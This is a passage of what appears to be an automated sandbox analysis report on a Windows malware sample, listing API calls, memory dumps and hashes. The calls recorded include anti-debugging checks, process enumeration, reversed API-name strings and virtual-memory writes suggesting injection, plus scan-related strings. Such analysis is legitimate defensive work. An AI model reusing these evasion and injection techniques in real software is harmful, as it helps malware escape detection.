                                                                          • Part of subcall function 02C67D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                        • API String ID: 1002360270-4067648912
                                                                        • Opcode ID: f61153f747e0721065eb5c59c9d48b548aad4efe79a7500a086887c2bcd419c5
                                                                        • Instruction ID: 39a23035edbfed7650c446b6df96573197535e02a31043de03deeb405cfe44a8
                                                                        • Opcode Fuzzy Hash: f61153f747e0721065eb5c59c9d48b548aad4efe79a7500a086887c2bcd419c5
                                                                        • Instruction Fuzzy Hash: 6CF04F71AC23245FE310A669A889F67B7EC9785B14F000B6ABD0CC7140C775589CCB54

                                                                        Control-flow Graph

                                                                        • Rendered as an image in the original report; executed/not-executed colouring is not recoverable from the text.
                                                                        • Function 02C6F744, basic blocks 02C6F744 through 02C6F792: GetModuleHandleW, then GetProcAddress, then CheckRemoteDebuggerPresent if the lookup succeeded; all paths rejoin at the exit block 02C6F78A.
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02C6F754
                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C6F766
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C6F77D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                        • API String ID: 35162468-539270669
                                                                        • Opcode ID: bcd8b10ef9ba01c2a9a8afcdcd09e3245f918615b0bdaf46cefb5246d477b0c5
                                                                        • Instruction ID: a0a11fc0cd6a90e9695005813acf87d4e6b64fb429019c4854522dacc99c8447
                                                                        • Opcode Fuzzy Hash: bcd8b10ef9ba01c2a9a8afcdcd09e3245f918615b0bdaf46cefb5246d477b0c5
                                                                        • Instruction Fuzzy Hash: AAF0A77090425CBAEB10A6B898CC7ECFBBD5B05329F6443A8D836A25C1E7714780CA55

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 02C54F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C54F2E
                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C6DE40), ref: 02C6DDAB
                                                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C6DE40), ref: 02C6DDDB
                                                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C6DDF0
                                                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C6DE1C
                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C6DE25
                                                                          • Part of subcall function 02C54C60: SysFreeString.OLEAUT32(02C6F4A4), ref: 02C54C6E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                        • String ID:
                                                                        • API String ID: 1897104825-0
                                                                        • Opcode ID: 1d4c02cc90b8fa0511275869e093dc1327992a52a0082d09b4abafe54162b2d6
                                                                        • Instruction ID: 386770ab28c20652529fb240fbe8a3895cb07e298bd4eac74557ad21f53564fb
                                                                        • Opcode Fuzzy Hash: 1d4c02cc90b8fa0511275869e093dc1327992a52a0082d09b4abafe54162b2d6
                                                                        • Instruction Fuzzy Hash: 3B210371B40319BAEB11EBD4CC96FEE77BDEB48700F500561B601F71C0DA74AA449B94

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C6E5F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
• Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 31138f37b3c130a6a9ceee505fdcf93dac99755fa17547dd529156e687fb5671
• Instruction ID: de1d694314b810a55f7577693163c7dca13be4d6a48dfda7cdb7a868408a74e2
• Opcode Fuzzy Hash: 31138f37b3c130a6a9ceee505fdcf93dac99755fa17547dd529156e687fb5671
• Instruction Fuzzy Hash: 08411D35A0011C9BEB24EFA4D881EEEB3FAEF88700F104422E441E7250DA74ED81EF59

Control-flow Graph

APIs
  • Part of subcall function 02C54F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C54F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C6DD5E), ref: 02C6DCCB
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C6DD05
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C6DD32
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C6DD3B
Memory Dump Source
• Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
• Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: 7d10a4db93aef1dd8997e24699fe283f2287a78bfa1de0ad0a80b17c29e48373
• Instruction ID: 732bbab4e5bf9047957659f0f0057a21fad63443e15aaec8bd360790ebc74e01
• Opcode Fuzzy Hash: 7d10a4db93aef1dd8997e24699fe283f2287a78bfa1de0ad0a80b17c29e48373
• Instruction Fuzzy Hash: 0321F171A40219BAEB20EF94CD86FEEB7BDEB44B00F514561B601F71C0D7B0AA449B64
APIs
  • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
  • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
  • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
  • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
  • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C67A9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
• Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: 9d0d44c8a624d95eaddc159647302b52b9e1ec4ee9c9d13d08f198a5e2127a34
• Instruction ID: 076dd60738a9a9bc3908b8a7235bace968e4c6e3b7de39573de09fa84d960f80
• Opcode Fuzzy Hash: 9d0d44c8a624d95eaddc159647302b52b9e1ec4ee9c9d13d08f198a5e2127a34
• Instruction Fuzzy Hash: 08116D75680208BFEB14EFA4DC85FAEB7EEEB48704F404965B904D7200D630EA58DB24
APIs
  • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
  • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
  • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
  • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
  • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C67A9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
• Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: 5942078fdce34e0420fa7a4d1d716000bd067d5d581341c09685cce8d63906d0
• Instruction ID: fc4646bf6936ad0ef77cb89793c415e988217e34a209ee4c6aa8fbdfb3cc77d8
• Opcode Fuzzy Hash: 5942078fdce34e0420fa7a4d1d716000bd067d5d581341c09685cce8d63906d0
• Instruction Fuzzy Hash: A8118075680208BFEB14EFA4DC85FAEB7EEEB48704F404965B904D7200D630EA58DB24
APIs
  • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
  • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
  • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
  • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
  • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
• Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
Similarity
• API ID: HandleModule$AddressProc$MemoryVirtualWrite
• String ID: Ntdll$yromeMlautriVetirW
• API String ID: 2719805696-3542721025
• Opcode ID: 2697415d19213f49e1e0040d507dbd3c129c27d852b3726782bf0eaa85981689
• Instruction ID: 1d8907b0fd5489ab72852a42492ab790f458655153c9cfc20d2cac688785b8a7
• Opcode Fuzzy Hash: 2697415d19213f49e1e0040d507dbd3c129c27d852b3726782bf0eaa85981689
• Instruction Fuzzy Hash: 32018C75640248AFDB14EFA8DC89EAAB7EDEB49704F504861B804D7600D630ED68DB64
APIs
• RtlI.N(?,?,00000000,02C6DC7E), ref: 02C6DC2C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC42
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC61
Memory Dump Source
• Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
• Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
Similarity
• API ID: Path$DeleteFileNameName_
• String ID:
• API String ID: 4284456518-0
• Opcode ID: a1c3e4373ac7540a623920c6fc329aec33e1dde1f02df8e86b4832356ef1f33c
• Instruction ID: c9b9804c89af07ef03f13cfe1ac3718f30fc9761947d8188dbb3975999d31888
• Opcode Fuzzy Hash: a1c3e4373ac7540a623920c6fc329aec33e1dde1f02df8e86b4832356ef1f33c
• Instruction Fuzzy Hash: 9001A235B4460D7EEB05DBA0DDC5FED77BEAB84304F5104E2D202E6081DAB4AB049B24
APIs
  • Part of subcall function 02C54F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C54F2E
• RtlI.N(?,?,00000000,02C6DC7E), ref: 02C6DC2C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC42
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC61
  • Part of subcall function 02C54C60: SysFreeString.OLEAUT32(02C6F4A4), ref: 02C54C6E
Memory Dump Source
• Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
• Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
Similarity
• API ID: PathString$AllocDeleteFileFreeNameName_
• String ID:
• API String ID: 1530111750-0
• Opcode ID: f5521a301b8e8a8b17cbb20ceb8c251cdea35bd8fed88cbe5174651d802fa1ae
• Instruction ID: c78d8dc7f0a20bbf37d7083cb41bc39b57b796a2b4be6fb3ba5048bb31cd31d6
• Opcode Fuzzy Hash: f5521a301b8e8a8b17cbb20ceb8c251cdea35bd8fed88cbe5174651d802fa1ae
• Instruction Fuzzy Hash: 06014471A4020DBEDB11EBA0DD86FDDB3FDEB48700F5044B1E602E2180EB74AB049A64
                                                                        APIs
                                                                          • Part of subcall function 02C66D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02C66DB9,?,?,?,00000000), ref: 02C66D99
                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,02C66EAC,00000000,00000000,02C66E2B,?,00000000,02C66E9B), ref: 02C66E17
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFromInstanceProg
                                                                        • String ID:
                                                                        • API String ID: 2151042543-0
                                                                        • Opcode ID: 6b6c6da07c0399a673042ef3163bf2c67f4cc067f011ca669eebbf9a0cb63905
                                                                        • Instruction ID: ffb5f9ca39215a220a5f33dbeb062a32324231fa91c8d9d385304be0f173939a
                                                                        • Opcode Fuzzy Hash: 6b6c6da07c0399a673042ef3163bf2c67f4cc067f011ca669eebbf9a0cb63905
                                                                        • Instruction Fuzzy Hash: FC012631608744AEFB15EFA1DCA687FBBBDE749B00F610835F805E2680E6389900D864
                                                                        APIs
                                                                          • Part of subcall function 02C6AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C6ADA3,?,?,02C6AE35,00000000,02C6AF11), ref: 02C6AB30
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C6AB48
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C6AB5A
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C6AB6C
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C6AB7E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C6AB90
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C6ABA2
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C6ABB4
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C6ABC6
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C6ABD8
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C6ABEA
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C6ABFC
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C6AC0E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C6AC20
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C6AC32
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C6AC44
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C6AC56
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02C6AE35,00000000,02C6AF11), ref: 02C6ADA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 2242398760-0
                                                                        • Opcode ID: f7c00887b9086770e2b4359abab48720f3795cc8d192342debe042b3d1564509
                                                                        • Instruction ID: 120512480ff265c31383571b3085aae56d335d82e2507b081760cf18e3d77e80
                                                                        • Opcode Fuzzy Hash: f7c00887b9086770e2b4359abab48720f3795cc8d192342debe042b3d1564509
                                                                        • Instruction Fuzzy Hash: D7C080B3702130178A2067F42CCC5D3574DCD851B730408F3F904F3101D7254C1091D0
                                                                        APIs
                                                                        • InetIsOffline.URL(00000000,00000000,02C7B784,?,?,?,00000000,00000000), ref: 02C6F801
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                          • Part of subcall function 02C6F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02C6FAEB,UacInitialize,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,Initialize), ref: 02C6F6EE
                                                                          • Part of subcall function 02C6F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02C6F700
                                                                          • Part of subcall function 02C6F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02C6F754
                                                                          • Part of subcall function 02C6F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02C6F766
                                                                          • Part of subcall function 02C6F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C6F77D
                                                                          • Part of subcall function 02C57E5C: GetFileAttributesA.KERNEL32(00000000,?,02C7041F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,UacInitialize), ref: 02C57E67
                                                                          • Part of subcall function 02C5C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DCB8B8,?,02C70751,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession), ref: 02C5C37B
                                                                          • Part of subcall function 02C6DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C6DE40), ref: 02C6DDAB
                                                                          • Part of subcall function 02C6DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C6DE40), ref: 02C6DDDB
                                                                          • Part of subcall function 02C6DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C6DDF0
                                                                          • Part of subcall function 02C6DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C6DE1C
                                                                          • Part of subcall function 02C6DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C6DE25
                                                                          • Part of subcall function 02C57E80: GetFileAttributesA.KERNEL32(00000000,?,02C7356F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,Initialize), ref: 02C57E8B
                                                                          • Part of subcall function 02C58048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02C7370D,OpenSession,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,Initialize,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8), ref: 02C58055
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
